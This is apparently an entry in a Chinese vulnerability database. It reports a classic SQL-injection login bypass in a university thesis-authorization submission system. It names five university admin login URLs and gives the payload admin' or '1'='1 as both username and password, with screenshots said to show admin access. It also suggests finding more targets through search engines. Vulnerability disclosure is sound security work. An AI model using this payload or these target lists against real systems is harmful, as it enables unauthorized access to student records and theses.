|某论文授权提交系统万能密码直接进行后台（影响很大）

某论文授权提交系统万能密码直接进行后台（影响很大）

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：论文授权提交系统这个影响危害性我不用多说。。 google 百度一大推（很多案例好多重点大学）可对论文进行操作危害性很大了 ### 详细说明： google 或者百度 ``` 论文授权提交系统 ``` 可以看到很多案例软件产家 ``` 北京方正阿帕比技术有限公司 ``` 我们提出几个案例进行证明验证 ``` http://pss.uestc.edu.cn/tasi/admin/ ``` 账号跟密码都为 ``` admin' or '1'='1 ``` [<img src="https://images.seebug.org/upload/201410/201440346933505c0c2ce23c5130bced3cbaf8f9.png" alt="533.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/201440346933505c0c2ce23c5130bced3cbaf8f9.png) 就可以登录了 [<img src="https://images.seebug.org/upload/201410/20144123ed74f50cd26b5223ba4ccfd39e7680a8.png" alt="534.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/20144123ed74f50cd26b5223ba4ccfd39e7680a8.png) 案例二 ``` http://202.120.121.200/tasi/admin/ ``` 账号名跟密码都是 ``` admin' or '1'='1 ``` [<img src="https://images.seebug.org/upload/201410/20144503056405403149a0dcb7192a17c70306cd.png" alt="535.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/20144503056405403149a0dcb7192a17c70306cd.png) 登录了 [<img src="https://images.seebug.org/upload/201410/201445432e2feb28d9438a823ecca878d57c5927.png" alt="536.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/201445432e2feb28d9438a823ecca878d57c5927.png) 案例三 ``` http://paper.sysu.edu.cn/TASi/admin/login.asp ``` 账号名跟密码都是 ``` admin' or '1'='1 ``` [<img src="https://images.seebug.org/upload/201410/20144740494c5cc7453a901b8ae4d1e0ebdbb1c0.png" alt="537.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/20144740494c5cc7453a901b8ae4d1e0ebdbb1c0.png) [<img src="https://images.seebug.org/upload/201410/201447589b2a8d730a42c0feddc122ac0c6b73f4.png" alt="538.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/201447589b2a8d730a42c0feddc122ac0c6b73f4.png) 案例四 ``` http://202.117.102.169/admin/ ``` 账号名跟密码都是 ``` admin' or '1'='1 ``` [<img src="https://images.seebug.org/upload/201410/201732595f5d66ac8ceb7cff03d7cbcf9f3df738.png" alt="651.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/201732595f5d66ac8ceb7cff03d7cbcf9f3df738.png) 登录了 [<img src="https://images.seebug.org/upload/201410/201733207a7f911d01c629b0bd1675215465cf1c.png" alt="652.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/201733207a7f911d01c629b0bd1675215465cf1c.png) 案例五 ``` http://202.112.150.64/TASi/admin/ ``` 账号名跟密码都是 ``` admin' or '1'='1 ``` [<img src="https://images.seebug.org/upload/201410/201735216bf874410d3e3606f5f0165c307eeb0c.png" alt="653.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/201735216bf874410d3e3606f5f0165c307eeb0c.png) 登录了 [<img src="https://images.seebug.org/upload/201410/201735438e701de5f89aa8109400620d761a912b.png" alt="654.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/201735438e701de5f89aa8109400620d761a912b.png) 其他案例类似 ### 漏洞证明：漏洞证明如上

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™